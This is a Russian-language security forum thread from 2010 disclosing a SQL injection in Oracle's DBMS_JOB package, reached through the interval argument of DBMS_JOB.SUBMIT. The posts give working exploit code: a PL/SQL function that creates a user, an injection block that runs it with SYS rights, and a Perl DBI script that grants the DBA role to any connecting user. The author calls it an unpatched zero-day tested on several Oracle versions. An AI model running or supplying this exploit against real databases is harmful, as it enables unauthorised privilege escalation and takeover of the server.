TARGET: ORACLE: DBMS_JOB PACKAGE, find_date FUNCTION sql-injection

Discussion in 'Уязвимости' started by [ DSU ], 9 Apr 2010.

  1. [ DSU ]

    [ DSU ] Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    103
    Likes Received:
    96
    Reputations:
    88
    Делать было нечего дело было вечером :)
    Не люблю много писать так что по порядку, искал функцию уязвимую к sql-injection под свои нужды, наткнулся на таковую в пакете dbms_job который принадлежит sys пользователю, функция find_date

    Code:
    ...
       30    CUR := DBMS_SQL.OPEN_CURSOR;
       31       BEGIN
       32 	
       33         DBMS_SYS_SQL.PARSE_AS_USER( CUR, 'select sysdate, ' || INTERVAL ||
       34 				    ' from dual', DBMS_SQL.NATIVE );
    ...
    Уязвим параметр INTERVAL, но тут проблема функция не обьявлена в пакете то есть иё можно использовать только внутри пакета, под мои нужды это не подходит мб кому-то и подойдет :). Но чтоб довести дело до победного конца нашел процедуру в пакете которая эту функцию использует, она там не одна но так как мне эта функция не подошла я взял первую попавшуюся :)
    Code:
    ...
      134     MYDATE := FIND_DATE(INTERVAL);
      135     IF NOT NO_PARSE THEN
      136       PARSE_JOB(WHAT);
      137     END IF;
      138 
    ...
    1. Создаем функцию, можно использовать и курсор но я предпочитаю старую школу :)
    Code:
    CREATE OR REPLACE FUNCTION fff return varchar2
    authid current_user as
    pragma autonomous_transaction;
    BEGIN
    EXECUTE IMMEDIATE 'create user fff identified by fff';
    COMMIT;
    RETURN 'sys';
    END;
    /
    
    2. Ну и собственно сам сплоит
    Code:
    DECLARE
     jobNo BINARY_INTEGER;
    BEGIN
    jobNo:=4242;
    dbms_job.submit(jobNo, 'do_job;', TRUNC(SYSDATE+(1/24), 'HH'),'TRUNC(SYSDATE+(30/24/60),''MI'') from dual where chr(115)=sys.fff() --');
    END;
    
    DB Version: Oracle XE, Oracle 10gR2(возможно и более ранние)
    OS: Win XP SP3, Solaris(тестировалось только на этом).

    P.S Шедулер у меня выключен при попытки создать задачу на вин процедура выводила ошибку но функция выполнилась :)
    Да процедура isubmit так-же уязвима :) тем же способом.
    DSU from Ukrainian Security Community
     
    #1 [ DSU ], 9 Apr 2010
    Last edited: 10 Apr 2010
    15 people like this.
  2. [ DSU ]

    [ DSU ] Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    103
    Likes Received:
    96
    Reputations:
    88
    В 9i проверили по моей просьбе, работает :)
    Да забыл добавить, патча нет... зеродэй короче :)
     
    3 people like this.
  3. [ DSU ]

    [ DSU ] Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    103
    Likes Received:
    96
    Reputations:
    88
    Perl version.

    Code:
    #!/usr/bin/perl
    use warnings;
    use strict;
    use DBI;
    use Getopt::Std;
    use vars qw/ %opt /;
    
    sub usage {
        print <<"USAGE";
        
    Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> [-P <port>]
    
    Options:
         -h     <host>     target server address
         -s     <sid>      target sid name
         -u     <user>     user
         -p     <passwd>   password 
    
         
        [-P     <port>     Oracle port]
    
    USAGE
        exit 0
    }
    
    my $opt_string = 'h:s:u:p:grP:';
    getopts($opt_string, \%opt) or &usage;
    &usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
    &usage if ( !$opt{g} and !$opt{r} );
    my $user = uc $opt{u};
    
    my $dbh = undef;
    if ($opt{P}) {
        $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
    } else {
        $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
    }
    
    my $sqlcmd = "GRANT DBA TO $user";
    
    print "[-] Creating function...\n";
    $dbh->do( qq{
    CREATE OR REPLACE FUNCTION fff return varchar2
    authid current_user as
    pragma autonomous_transaction;
    BEGIN
    EXECUTE IMMEDIATE '$sqlcmd'; COMMIT;
    COMMIT;
    RETURN 'sys';
    END;
    } );
     
    print "[-] Go...\n";
    my $sth = $dbh->prepare( qq{
    DECLARE
     jobNo BINARY_INTEGER;
    BEGIN
    jobNo:=4242;
    dbms_job.submit(jobNo, 'do_job;', TRUNC(SYSDATE+(1/24), 'HH'),'TRUNC(SYSDATE+(30/24/60),''MI'') from dual where chr(115)=sys.fff() --');
    END;});
    $sth->execute;
    $sth->finish;
    print "[-] Executed\n";
    $dbh->disconnect;
    exit;
    
     
    7 people like this.